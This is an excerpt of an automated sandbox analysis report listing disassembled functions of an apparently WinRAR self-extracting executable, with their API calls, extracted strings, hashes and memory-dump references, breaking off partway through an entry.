                                                  • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                  • API String ID: 2868844859-1533471033
                                                  • Opcode ID: 11aacd67445855d745a7f015c66ec02737dd5eaa18f827b11f87478fd2bdef61
                                                  • Instruction ID: ce479cbd8738ac765687863e5caf67aca3dcda76393d0fc17aa0e8d6d26935a8
                                                  • Opcode Fuzzy Hash: 11aacd67445855d745a7f015c66ec02737dd5eaa18f827b11f87478fd2bdef61
                                                  • Instruction Fuzzy Hash: DB81CE22B28B4295FB00DFA5E8622EC2371AF4878AF400575DE9DD769BEE38D506C344
                                                  Function 00007FF6CA9FE650 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                  • API String ID: 3215553584-2617248754
                                                  • Opcode ID: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
                                                  • Instruction ID: c2161d135a8881df639395447c8ef51214f0bf16795febc7ad651808394a96b8
                                                  • Opcode Fuzzy Hash: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
                                                  • Instruction Fuzzy Hash: 8341B172A15B8599EB00CF65F8627AD33A4EB14398F00417AEE8D87B95DE3DD066C344
                                                  Function 00007FF6CA9EA440 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 257COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                                  • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                  • API String ID: 3936042273-1315819833
                                                  • Opcode ID: e06248dbc4aeee0b93656e9211be1d96d36a322bc908ac185a645397fe30106c
                                                  • Instruction ID: 1f28b12997e28d0ccf24e773a7b7be1d29d1462dd2016a713e6afa5cedeb4374
                                                  • Opcode Fuzzy Hash: e06248dbc4aeee0b93656e9211be1d96d36a322bc908ac185a645397fe30106c
                                                  • Instruction Fuzzy Hash: A7B1D362F2978685FB00DFA4E4652BC2371AF46796F004275DA9CA7AEBDE3CD046C344
                                                  Function 00007FF6CA9EF390 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 85windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageSend$ClassLongNameObject
                                                  • String ID: STATIC
                                                  • API String ID: 3746718000-1882779555
                                                  • Opcode ID: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
                                                  • Instruction ID: 8c73c586e16ca85413cf6c4a7fa688d407df3fe2e2a29fd47668713d9237ad7e
                                                  • Opcode Fuzzy Hash: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
                                                  • Instruction Fuzzy Hash: 1A31D421B1864282FA60DF56B5297B923A1FF88BC2F444071DD8EC7B57EE3CD4428780
                                                  Function 00007FF6CA9DB9B4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 84libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$CurrentDirectoryProcessSystem
                                                  • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                  • API String ID: 2915667086-2207617598
                                                  • Opcode ID: d2e93635ec338890dfe438c4789fcaf7e26687fbfe6c7ce53d5981307f2d6baa
                                                  • Instruction ID: 028e592dd02c68cebf81d9c3a2ac5a7f40af3c0a7017d624cf8321c6d55fbeca
                                                  • Opcode Fuzzy Hash: d2e93635ec338890dfe438c4789fcaf7e26687fbfe6c7ce53d5981307f2d6baa
                                                  • Instruction Fuzzy Hash: 63315A24F19B4280FA149F92B97A17523E0AF5AB92F0401B5C8CFC73A6DE3CE592C304
                                                  Function 00007FF6CA9E87D8 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 415COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID: $
                                                  • API String ID: 3668304517-227171996
                                                  • Opcode ID: 1572f1a22ab36082d91ab82161cd04eeb34c805c2d1653d7b6ef09d0f2fd88c1
                                                  • Instruction ID: e361048f62c1fd27b742b2883a81df046e69125abd18867555d402f13d180753
                                                  • Opcode Fuzzy Hash: 1572f1a22ab36082d91ab82161cd04eeb34c805c2d1653d7b6ef09d0f2fd88c1
                                                  • Instruction Fuzzy Hash: 9AF1C262F25A4680EF009FA4E46A1BC23A1BB44B99F509671DAADD77D7DF7CD081C380
                                                  Function 00007FF6CA9F57EC Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 317COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 2940173790-393685449
                                                  • Opcode ID: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
                                                  • Instruction ID: eb60ace95c43ca5bba5c67a15616bd4bea560382fcd675793474276bfb4b425b
                                                  • Opcode Fuzzy Hash: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
                                                  • Instruction Fuzzy Hash: 55E1A2729287828AE710DF25E8A23AD7BA0FB45759F144179EACDC7697CF38E485C700
                                                  Function 00007FF6CA9D4F38 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 158COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: AllocClearStringVariant
                                                  • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                  • API String ID: 1959693985-3505469590
                                                  • Opcode ID: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
                                                  • Instruction ID: b9c664f90d7f5088409c8577660777cf98024e84998501338c616a54cf0baa9b
                                                  • Opcode Fuzzy Hash: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
                                                  • Instruction Fuzzy Hash: B2714A36A24B4585EB20CF65E8A05AD37B0FB88B99B045176EE8EC3B64CF3CD585C700
                                                  Function 00007FF6CA9EAE90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 94COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ItemTextWindow
                                                  • String ID: LICENSEDLG
                                                  • API String ID: 2478532303-2177901306
                                                  • Opcode ID: e29db3841e3cac596c2aa5df9f59b5580221106af80a371471668d29e16b4ce4
                                                  • Instruction ID: 63aa03997c32f074448ab370301189b697fc173f8f211e197e1256b43b316426
                                                  • Opcode Fuzzy Hash: e29db3841e3cac596c2aa5df9f59b5580221106af80a371471668d29e16b4ce4
                                                  • Instruction Fuzzy Hash: A141C521A1865682F7249F52B8353792760BF85F87F0445B5D98EC7BA6CF3CE9868340
                                                  Function 00007FF6CA9F72EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6CA9F74F3,?,?,?,00007FF6CA9F525E,?,?,?,00007FF6CA9F5219), ref: 00007FF6CA9F7371
                                                  • GetLastError.KERNEL32(?,?,00000000,00007FF6CA9F74F3,?,?,?,00007FF6CA9F525E,?,?,?,00007FF6CA9F5219), ref: 00007FF6CA9F737F
                                                  • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6CA9F74F3,?,?,?,00007FF6CA9F525E,?,?,?,00007FF6CA9F5219), ref: 00007FF6CA9F73A9
                                                  • FreeLibrary.KERNEL32(?,?,00000000,00007FF6CA9F74F3,?,?,?,00007FF6CA9F525E,?,?,?,00007FF6CA9F5219), ref: 00007FF6CA9F73EF
                                                  • GetProcAddress.KERNEL32(?,?,00000000,00007FF6CA9F74F3,?,?,?,00007FF6CA9F525E,?,?,?,00007FF6CA9F5219), ref: 00007FF6CA9F73FB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  • Opcode ID: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
                                                  • Instruction ID: 7f5247b0a95dfd09dc4404a930df8e0f7a9f058bf6204aa49bf58aa0a9704002
                                                  • Opcode Fuzzy Hash: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
                                                  • Instruction Fuzzy Hash: 22312621B2AA42A1EE16EF86BC215752394FF08BA5F494579ED9EC7382DF7CE041C310
                                                  Function 00007FF6CA9F1604 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43libraryloaderCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(?,?,?,00007FF6CA9F1573,?,?,?,00007FF6CA9F192A), ref: 00007FF6CA9F162B
                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF6CA9F1573,?,?,?,00007FF6CA9F192A), ref: 00007FF6CA9F1648
                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF6CA9F1573,?,?,?,00007FF6CA9F192A), ref: 00007FF6CA9F1664
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$HandleModule
                                                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                  • API String ID: 667068680-1718035505
                                                  • Opcode ID: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                                                  • Instruction ID: e75a736142998b8058a16d965048eac5f07bb009e669b7c3620a641de1046f7e
                                                  • Opcode Fuzzy Hash: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                                                  • Instruction Fuzzy Hash: 61115E20E29B4281FE588F41BE7527422A16F0C796F6C45B9EB9EC7351EE3CA4568780
                                                  Function 00007FF6CA9DED24 Relevance: 9.1, APIs: 6, Instructions: 120timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF6CA9D51A4: GetVersionExW.KERNEL32 ref: 00007FF6CA9D51D5
                                                  • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6CA9C5AB4), ref: 00007FF6CA9DED8C
                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6CA9C5AB4), ref: 00007FF6CA9DED98
                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6CA9C5AB4), ref: 00007FF6CA9DEDA8
                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6CA9C5AB4), ref: 00007FF6CA9DEDB6
                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6CA9C5AB4), ref: 00007FF6CA9DEDC4
                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6CA9C5AB4), ref: 00007FF6CA9DEE05
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Time$File$System$Local$SpecificVersion
                                                  • String ID:
                                                  • API String ID: 2092733347-0
                                                  • Opcode ID: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                                                  • Instruction ID: d7851612a4b4fd77dc7d8ceb84f1b574d392553ddc242afc0a0b9841cb6c95a3
                                                  • Opcode Fuzzy Hash: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                                                  • Instruction Fuzzy Hash: 92517BB2F106518EEB14CFA8E4551AC37B1F748B89B60403ADE5EA7B58DF38E596C700
                                                  Function 00007FF6CA9DF010 Relevance: 9.1, APIs: 6, Instructions: 80timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Time$File$System$Local$SpecificVersion
                                                  • String ID:
                                                  • API String ID: 2092733347-0
                                                  • Opcode ID: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                                                  • Instruction ID: 3e19f310fb0693c380fa8644a25fbee4294d4384f786ff6f5ab19cfdd6dc3af2
                                                  • Opcode Fuzzy Hash: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                                                  • Instruction Fuzzy Hash: 13314862F10A519EFB04CFB5E8911AC3370FB18759B54502AEE5EE3A58EF38D896C704
                                                  Function 00007FF6CA9D7918 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 233COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID: .rar$exe$rar$sfx
                                                  • API String ID: 3668304517-630704357
                                                  • Opcode ID: 9b8f9fc42827f07993982fd9f343e807743a6e075335c2f478db097a4822f4c0
                                                  • Instruction ID: 831f06cae7030a093f6f547cdfc0f87b1337114664524eb075b7ffe5720b915f
                                                  • Opcode Fuzzy Hash: 9b8f9fc42827f07993982fd9f343e807743a6e075335c2f478db097a4822f4c0
                                                  • Instruction Fuzzy Hash: 10A1BF22E24A4640EB049F75E8662B83361AF44B99F501275DE9EC77EBDF3CE582C340
                                                  Function 00007FF6CA9F5CE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 191COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: abort$CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 2889003569-2084237596
                                                  • Opcode ID: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                  • Instruction ID: bd4671557fdf4e7073b09699d4cf0267ffc5acb5742606573548470c5708cc48
                                                  • Opcode Fuzzy Hash: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                  • Instruction Fuzzy Hash: DD91CE73A28B919AE710CF64E8913AD7BA0F704789F104179EE8D87B5ADF38D195CB00
                                                  Function 00007FF6CA9F4F80 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
